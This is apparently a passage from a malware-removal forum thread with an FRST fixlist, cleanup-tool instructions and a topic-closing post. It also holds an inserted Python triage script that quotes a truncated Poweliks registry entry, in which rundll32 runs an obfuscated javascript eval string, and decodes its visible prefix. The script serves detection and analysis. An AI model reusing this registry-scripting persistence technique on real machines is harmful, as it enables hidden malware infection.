CHR Extension: (Google Wallet) - C:\Users\hstagner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-10-09]
CHR HKLM-x32\...\Chrome\Extension: [cnpkmcjgpcihgfnkcjapiaabbbplkcmf] - C:\Program Files (x86)\Coupons.com CouponBar\chrome\Coupons.com.crx [2013-07-15]
R2 CouponPrinterService; C:\Program Files (x86)\Coupons\CouponPrinterService.exe [177648 2014-03-28] (Coupons.com Inc.)
U3 tmpfw; No ImagePath
AlternateDataStreams: C:\ProgramData\TEMP:0574215C
AlternateDataStreams: C:\ProgramData\TEMP:D95ACC7D
 
End
Save the file as fixlist.txt into the same folder as FRST.
 
Run FRST and click Fix only once and wait.
 
Restart the computer normally to reset the registry.
 
The tool will create a log (Fixlog.txt); please post it in your reply.
===
 
Please download AdwCleaner by Xplode onto your Desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Click the Report button and the report will open in Notepad.
  • IMPORTANT: If you click the Clean button, all items listed in the report will be removed.
  • If you find some false positive items or programs that you wish to keep, close the AdwCleaner windows.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Check off the element(s) you wish to keep.
  • Click on the Clean button and follow the prompts.
  • A log file will automatically open after the scan has finished.
  • Please post the content of that log file with your next answer.
  • You can find the log file at C:\AdwCleaner[Sn].txt (n is a number).
===
 
Download Security Check by screen317 from here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.
p.s. If the SecurityCheck program fails to run for any reason, run it as an Administrator.
 
If the site is busy or not available, use this mirror site:
 
How is the computer running now?
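A defender-side triage of the fixlist entries above, added here as an example and not part of nasdaq's reply or of the FRST tool: it flags a COM LocalServer32 registration whose value hands rundll32 a script URL instead of an executable path (the Poweliks pattern FRST marked), and undoes the one-code-point shift in the visible eval() string so an analyst can read what it starts with. The third input line is a constructed benign entry for contrast; the truncation marker is FRST's own wording from the flagged line.

```python
import re

# Lines copied from the FRST fixlist in the reply above; the third line is a constructed,
# benign LocalServer32 entry added so the filter has something to pass over.
FRST_LINES = [
    r'HKU\S-1-5-21-2926875163-4226794389-2330185411-1131\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!',
    r'R2 CouponPrinterService; C:\Program Files (x86)\Coupons\CouponPrinterService.exe [177648 2014-03-28] (Coupons.com Inc.)',
    r'HKLM\...\{CONSTRUCTED-CLSID}\localserver32: "C:\Program Files\Vendor\app.exe"',
]

# A COM LocalServer32 value is expected to name an executable on disk; a value that hands
# rundll32 a javascript:/vbscript: URL runs code straight out of the registry instead.
LOCALSERVER_RE = re.compile(r'\\localserver32:\s*(?P<value>.*)$', re.IGNORECASE)
SCRIPT_HOST_RE = re.compile(r'rundll32(?:\.exe)?\s+(?:javascript|vbscript):', re.IGNORECASE)
EVAL_RE = re.compile(r'eval\("([^"]*)')
FRST_TRUNCATION = ' (the data entry has'   # FRST's own marker for a cut-off registry value


def shift_decode(text, shift=1):
    """Undo the per-character +1 obfuscation seen in the eval() string:
    each character was stored one code point higher than the real one."""
    return ''.join(chr(ord(c) - shift) for c in text)


def triage_line(line):
    """Return a finding dict for a script-hosting LocalServer32 entry, else None."""
    m = LOCALSERVER_RE.search(line)
    if not m:
        return None
    value = m.group('value')
    if not SCRIPT_HOST_RE.search(value):
        return None
    finding = {'value': value, 'decoded_prefix': None}
    e = EVAL_RE.search(value)
    if e:
        # Only the part FRST printed is available; decode that much.
        encoded = e.group(1).split(FRST_TRUNCATION)[0]
        finding['decoded_prefix'] = shift_decode(encoded)
    return finding


def triage(lines):
    """Run triage_line over a whole log and keep the hits."""
    return [f for f in (triage_line(l) for l in lines) if f is not None]


if __name__ == '__main__':
    for f in triage(FRST_LINES):
        print('script-hosting LocalServer32:', f['value'][:60], '...')
        print('decoded prefix:', f['decoded_prefix'])
```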


#3 nasdaq
 
  • Malware Response Team
  • 40,213 posts
  • Gender:Male
  • Location:Montreal, QC. Canada
 
Posted 24 November 2014 - 09:36 AM
 
Due to the lack of feedback, this topic is now closed.
 
In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.
 
Please include a link to your topic in the Private Message. Thank you.